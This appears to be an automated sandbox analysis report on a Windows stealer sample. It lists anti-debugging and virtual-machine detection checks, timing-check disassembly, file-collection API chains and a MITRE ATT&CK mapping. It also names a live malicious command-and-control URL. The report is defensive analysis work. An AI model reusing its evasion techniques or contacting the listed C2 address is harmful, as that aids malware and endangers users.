                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB8388 second address: DB83A4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F1674F90E21h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBA6BE second address: DBA6C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF0CC second address: DBF0D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBEF89 second address: DBEFAA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1675279DA6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push edx 0x0000000e jmp 00007F1675279DB0h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBEFAA second address: DBEFB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC38CB second address: DC38CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC38CF second address: DC38D5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA632 second address: DCA637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA637 second address: DCA644 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jg 00007F1674F90E16h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA8F7 second address: DCA913 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1675279DA6h 0x00000008 jmp 00007F1675279DAFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA913 second address: DCA93C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F1674F90E1Dh 0x0000000a pushad 0x0000000b jmp 00007F1674F90E24h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA93C second address: DCA942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA942 second address: DCA94E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push esi 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCAAD0 second address: DCAAD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCAAD4 second address: DCAB18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F1674F90E28h 0x0000000e pop edi 0x0000000f push ebx 0x00000010 jne 00007F1674F90E18h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pop esi 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCAB18 second address: DCAB1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCAE0A second address: DCAE1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DCAF8F second address: DCAF95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DCE4A9 second address: DCE4BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push edi 0x00000008 push edx 0x00000009 pop edx 0x0000000a jg 00007F1674F90E16h 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DD87A3 second address: DD87D8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F1675279DB6h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1675279DB7h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE8BE6 second address: DE8BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F1674F90E16h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE8BF3 second address: DE8BF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE8BF9 second address: DE8BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DE8A74 second address: DE8A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DEAD6C second address: DEAD72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DEAD72 second address: DEAD78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DEAD78 second address: DEAD7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFA566 second address: DFA56E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFA56E second address: DFA5B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F1674F90E1Eh 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jl 00007F1674F90E16h 0x00000014 jo 00007F1674F90E16h 0x0000001a jmp 00007F1674F90E27h 0x0000001f popad 0x00000020 popad 0x00000021 push esi 0x00000022 pushad 0x00000023 js 00007F1674F90E16h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFA97D second address: DFA981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFA981 second address: DFA98A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFA98A second address: DFA991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFADB8 second address: DFADCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F1674F90E1Fh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFB397 second address: DFB39B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFCD5B second address: DFCD69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1674F90E1Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFCD69 second address: DFCD6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFCD6D second address: DFCD8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1674F90E21h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFCD8A second address: DFCD8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFCD8E second address: DFCD92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DFE494 second address: DFE4A4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E00D72 second address: E00D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1674F90E22h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E00F1A second address: E00F2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1675279DAFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E01038 second address: E01042 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1674F90E1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E02AEE second address: E02B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1675279DA6h 0x0000000a popad 0x0000000b pushad 0x0000000c jnp 00007F1675279DA6h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jmp 00007F1675279DB2h 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E02B15 second address: E02B1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E02B1D second address: E02B37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F1675279DAEh 0x0000000c push esi 0x0000000d pop esi 0x0000000e jng 00007F1675279DA6h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E4033C second address: 4E4036B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F1674F90E1Ch 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F1674F90E20h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ax, dx 0x00000019 mov cx, di 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E4036B second address: 4E40380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1675279DB1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E4042B second address: 4E4045E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push ecx 0x0000000d mov di, A7CEh 0x00000011 pop edx 0x00000012 mov esi, 18B7830Bh 0x00000017 popad 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E4045E second address: 4E40464 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E40464 second address: 4E40479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1674F90E21h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E40479 second address: 4E4047D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: B719FA instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: D13958 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: D26394 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: DA3622 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009238B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, | 0_2_009238B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00924910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 0_2_00924910
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, | 0_2_0091DA80
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, | 0_2_0091E430
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, | 0_2_0091ED20
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00924570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, | 0_2_00924570
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 0_2_0091F6B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00923EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, | 0_2_00923EA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009116D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 0_2_009116D0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 0_2_0091DE10
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, | 0_2_0091BE70
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00911160 GetSystemInfo,ExitProcess, | 0_2_00911160
                Source: file.exe, file.exe, 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1747007538.000000000102E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1747007538.00000000010A4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1747007538.0000000001072000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13638
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13587
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13584
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13605
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13598
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009145C0 VirtualProtect ?,00000004,00000100,00000000 | 0_2_009145C0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00929860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_00929860
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00929750 mov eax, dword ptr fs:[00000030h] | 0_2_00929750
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009278E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA, | 0_2_009278E0
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 7264, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00929600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, | 0_2_00929600
                Source: file.exe, file.exe, 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: TProgram Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, | 0_2_00927B90
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00927980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA, | 0_2_00927980
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00927850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, | 0_2_00927850
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00927A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, | 0_2_00927A30

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.910000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1704892194.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1747007538.000000000102E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 7264, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.910000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1704892194.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1747007538.000000000102E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 7264, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                MITRE ATT&CK Matrix (the number in parentheses is the count of matched signatures for that technique)

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Command and Scripting Interpreter (2) | DLL Side-Loading (1) | Process Injection (11) | Masquerading (1) | OS Credential Dumping | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Encrypted Channel (2) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Native API (11) | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (33) | LSASS Memory | Security Software Discovery (641) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (2) | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools (11) | Security Account Manager | Virtualization/Sandbox Evasion (33) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (11) | NTDS | Process Discovery (13) | Distributed Component Object Model | Input Capture | Application Layer Protocol (12) | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | Account Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (3) | Cached Domain Credentials | System Owner/User Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Software Packing (12) | DCSync | File and Directory Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | System Information Discovery (324) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Source | Detection | Scanner | Label | Link
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                file.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                http://185.215.113.37/ | 100% | URL Reputation | malware |
                http://185.215.113.37 | 100% | URL Reputation | malware |
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware |
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/0 | file.exe, 00000000.00000002.1747007538.0000000001088000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.php; | file.exe, 00000000.00000002.1747007538.0000000001072000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
